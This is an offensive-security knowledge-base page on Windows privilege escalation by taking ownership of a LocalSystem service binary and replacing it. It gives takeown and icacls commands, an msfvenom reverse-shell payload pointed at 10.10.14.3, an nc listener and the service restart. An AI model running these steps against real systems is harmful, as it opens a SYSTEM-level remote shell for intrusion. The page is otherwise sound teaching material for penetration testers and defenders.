Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter II - Local / 04. Windows / 02. Privilege Escalation / Privileges / SeTakeOwnershipPrivilege

Service Binary Replacement

Service binary replacement with SeTakeOwnershipPrivilege abuses ownership control over a service executable.

The primitive is ownership change followed by DACL change. If the target service runs as LocalSystem, replacing the binary can lead to SYSTEM execution when the service starts.

When enumerating this path, try to identify:

  • SeTakeOwnershipPrivilege in the current token
  • Service running as LocalSystem
  • Service binary path
  • Current binary owner and ACL
  • Ability to restart the service
  • Original binary hash and backup path

Enumeration

Inspect the service:

sc qc <ServiceName>

Record owner and ACL:

dir /q "C:\Path\To\Service.exe"
icacls "C:\Path\To\Service.exe"

Interesting findings include:

  • Service runs as LocalSystem
  • Normal write access is denied
  • Current user can take ownership
  • Service can be restarted or will restart on reboot

Once ownership and write access are obtained, replace the binary with a service-compatible payload.

Exploit

  1. Take ownership of the service binary.
takeown /f "C:\Path\To\Service.exe"
  1. Grant write access.
icacls "C:\Path\To\Service.exe" /grant %USERNAME%:F
  1. Preserve the original binary.
copy "C:\Path\To\Service.exe" "C:\Users\Public\Service.exe.bak"
  1. Generate a service-compatible payload.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.3 LPORT=9443 -f exe-service -o Service.exe
  1. Replace the binary.
copy /Y Service.exe "C:\Path\To\Service.exe"
  1. Start a listener.
nc -lnvp 9443
  1. Restart the service.
sc stop <ServiceName>
sc start <ServiceName>
  1. Verify context.
whoami
whoami /priv